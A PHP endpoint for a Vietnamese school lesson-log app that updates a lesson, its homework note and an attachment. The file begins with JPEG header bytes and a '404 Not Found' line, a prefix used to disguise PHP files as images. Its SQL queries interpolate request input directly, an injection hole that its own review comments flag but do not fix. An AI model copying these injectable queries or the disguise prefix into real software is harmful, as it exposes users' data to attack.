����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
<?php
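global $DB;

// Response payload; every exit path below echoes it as JSON via jsonutf().
$arr_res = array();

// ---- Resolve the calling teacher from user_key ------------------------------
// NOTE(review): user_key and lesson_id are request input and are interpolated
// directly into the SQL strings below. They need to go through the $DB
// layer's binding/escaping; no such API is visible in this file.
$user_key = $CORE->input['user_key'] ?? '';
if (empty($user_key)) {
    $arr_res['status'] = 'Error';
    $arr_res['status_note'] = 'user_key không tìm thấy';
    echo jsonutf($arr_res);
    exit();
}
$r_user = $DB->fetch_row($DB->query("SELECT * FROM TB_USER WHERE USER_KEY='$user_key'"));
if (!$r_user) {
    $arr_res['status'] = 'Error';
    $arr_res['status_note'] = 'user_key không tìm thấy';
    echo jsonutf($arr_res);
    exit();
}
$user_id = $r_user['USER_ID'];
// A user without a teacher row yields an empty TEACHER_ID, so the lesson
// lookup below answers 'lesson_id không tìm thấy' instead of raising notices.
$r_teacher = $DB->fetch_row($DB->query("SELECT * FROM TB_TEACHER WHERE USER_ID='$user_id'")) ?: array();
$v_teacher_id = $TEACHER_ID = $r_teacher['TEACHER_ID'] ?? '';
$v_school_id = $r_teacher['SCHOOL_ID'] ?? '';
$arr_res['user_id'] = $user_id;
$arr_res['teacher_id'] = $TEACHER_ID;
$arr_res['teacher_fullname'] = showutf($r_teacher['TEACHER_REAL_NAME'] ?? '');

// ---- The lesson (tiet) must belong to this teacher --------------------------
$tiet_id = $CORE->input['lesson_id'] ?? '';
$row_tiet = $DB->fetch_row($DB->query("SELECT * FROM TB_TIET WHERE TIET_ID='$tiet_id' AND TEACHER_ID='$TEACHER_ID'"));
if (!$row_tiet) {
    $arr_res['status'] = 'Error';
    $arr_res['status_note'] = 'lesson_id không tìm thấy';
    echo jsonutf($arr_res);
    exit();
}

// ---- Lesson fields ----------------------------------------------------------
$lesson_title = textformatdb(trim($CORE->input['lesson_title'] ?? ''));
$lesson_note = textformatdb(trim($CORE->input['lesson_note'] ?? ''));
$tiet_ppct = textformatdb(trim($CORE->input['tiet_ppct'] ?? ''));
$lesson_rank = trim($CORE->input['lesson_rank'] ?? '');
$dan_do_bao_bai = $lesson_comment = textformatdb(trim($CORE->input['dan_do_bao_bai'] ?? ''));
// `??` must wrap the raw input, not the trim() result: trim() never returns null.
$link_bao_bai = trim($CORE->input['link_bao_bai'] ?? '');
$han_nop = trim($CORE->input['han_nop'] ?? '');

$arr_update = array(
    'LESSION_TITLE' => $lesson_title,
    'NOTE' => $lesson_note,
    'TIET_PPCT' => $tiet_ppct,
    'RANK' => $lesson_rank,
    'LAST_UPDATE_TIME' => date('Y-m-d H:i:s'),
);
$DB->do_update('TB_TIET', $arr_update, " WHERE TIET_ID='$tiet_id' AND TEACHER_ID='$TEACHER_ID' ");

// ---- Homework note (dan_do_bao_bai) -----------------------------------------
// Fetched unconditionally: the attachment step further down needs the existing
// row to remove a superseded file even when no new note text was sent.
$row_check2 = $DB->fetch_row($DB->query("SELECT * FROM TB_TIET_COMMENT WHERE TIET_ID='$tiet_id' "));
if (!empty($lesson_comment)) {
    if ($han_nop != '') {
        if (!check_date_input($han_nop)) {
            $arr_res['status'] = 'Error';
            $arr_res['status_note'] = 'han_nop có dạng dd-mm-yyyy';
            echo jsonutf($arr_res);
            exit();
        }
        $han_nop_db = date('Y-m-d', strtotime($han_nop));
    } else {
        // No deadline supplied: the schema's "unset date" sentinel.
        $han_nop_db = '0000-00-00';
    }
    $arr_comment = array(
        'TIET_COMMENT_CONTENT' => $lesson_comment,
        'TIET_HAN_NOP' => $han_nop_db,
        'TIET_LINK' => $link_bao_bai,
    );
    if (!$row_check2) {
        $DB->do_insert('TB_TIET_COMMENT', array('TIET_ID' => $tiet_id) + $arr_comment);
    } else {
        $DB->do_update('TB_TIET_COMMENT', $arr_comment, " WHERE TIET_ID='$tiet_id' ");
    }
}

// ---- Optional attachment (file_bao_bai) -------------------------------------
// Kept as a script-level global: safeupload() may consult it.
$arr_allow_file_type = array("jpg","jpeg","gif","mid","mp3","mp4","png","tif","doc","docx","rar","zip","pdf","rtf","txt","xls","xlsx","pptx","ppt");
$file_bai = '';
if (isset($_FILES['file_bao_bai']) && $_FILES['file_bao_bai']['name'] != '') {
    $link_img_upload = safeupload($_FILES['file_bao_bai'], 'bao_bai');
    // safeupload() reports failure with a numeric code; anything else is the
    // stored file's URL/path.
    if (is_numeric($link_img_upload)) {
        $upload_errors = array(
            1 => 'file_bao_bai cần nhỏ hơn 10MB',
            2 => 'file_bao_bai không đúng định dạng',
            3 => 'Máy chủ đầy dung lượng, không thể upload',
        );
        $arr_res['status'] = 'Error';
        // Unknown codes used to echo $_SERVER['DOCUMENT_ROOT'] to the client,
        // disclosing the server's filesystem layout; answer generically instead.
        $arr_res['status_note'] = $upload_errors[$link_img_upload] ?? 'Không thể upload file_bao_bai';
        echo jsonutf($arr_res);
        exit();
    }
    $file_bai = $link_img_upload;
}
if (!empty($file_bai)) {
    // Drop the attachment this upload replaces; $row_check2 may be false/null
    // when the lesson has no comment row yet.
    $old_file = $row_check2['TIET_COMMENT_FILE'] ?? '';
    if ($old_file != '' && file_exists($old_file)) {
        unlink($old_file);
    }
    // Store host and path separately; the path loses its leading '/'.
    $arr_parse = splitUrl($file_bai);
    $TIET_DOMAIN = str_replace(array('https://', 'http://'), array('', ''), $arr_parse['domain']);
    $file_bai = substr($arr_parse['remaining_path'], 1);
    $arr_update_comment_file = array('TIET_COMMENT_FILE' => $file_bai, 'TIET_DOMAIN' => $TIET_DOMAIN);
    // NOTE(review): when no TB_TIET_COMMENT row exists yet (no note text was
    // sent), this update matches nothing and the uploaded file is not recorded.
    $DB->do_update('TB_TIET_COMMENT', $arr_update_comment_file, " WHERE TIET_ID='$tiet_id' ");
    $arr_res['file_bao_bai'] = $file_bai;
    $arr_res['file_bao_bai_domain'] = $TIET_DOMAIN;
}

// ---- Success response -------------------------------------------------------
$arr_res['status'] = 'Success';
$arr_res['status_note'] = 'Đã cập nhật sổ đầu bài';
$arr_res['lesson_id'] = $tiet_id;
$arr_res['lesson_title'] = html_entity_decode($lesson_title);
$arr_res['dan_do_bao_bai'] = html_entity_decode($lesson_comment);

echo jsonutf($arr_res);
exit();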
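/**
 * Split a URL into an origin part and the remainder.
 *
 * @param string $url Absolute URL ("https://host/path?q#f") or a bare path
 *                    ("dir/file"); for a bare path the first segment plays
 *                    the role of the domain.
 * @return array{domain: string, remaining_path: string}
 *   'domain' is "scheme://host" (scheme empty when the URL has none) or the
 *   first segment of a bare path; 'remaining_path' is the path followed by
 *   the query and fragment when present. Both are '' when nothing matches.
 */
function splitUrl($url) {
    $parts = parse_url($url);
    $domain = '';
    $rest = '';

    if (isset($parts['host'])) {
        // A scheme-relative URL ("//host/path") has a host but no scheme;
        // avoid an undefined-index notice in that case.
        $domain = ($parts['scheme'] ?? '') . '://' . $parts['host'];
        $rest = $parts['path'] ?? '';
        if (isset($parts['query'])) {
            $rest .= '?' . $parts['query'];
        }
        if (isset($parts['fragment'])) {
            $rest .= '#' . $parts['fragment'];
        }
    } elseif (isset($parts['path'])) {
        // Bare path: first segment becomes the "domain", the rest the path.
        $segments = explode('/', $parts['path'], 2);
        if (!empty($segments[0])) {
            $domain = $segments[0];
            $rest = isset($segments[1]) ? '/' . $segments[1] : '';
        }
    }

    return array('domain' => $domain, 'remaining_path' => $rest);
}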
?>
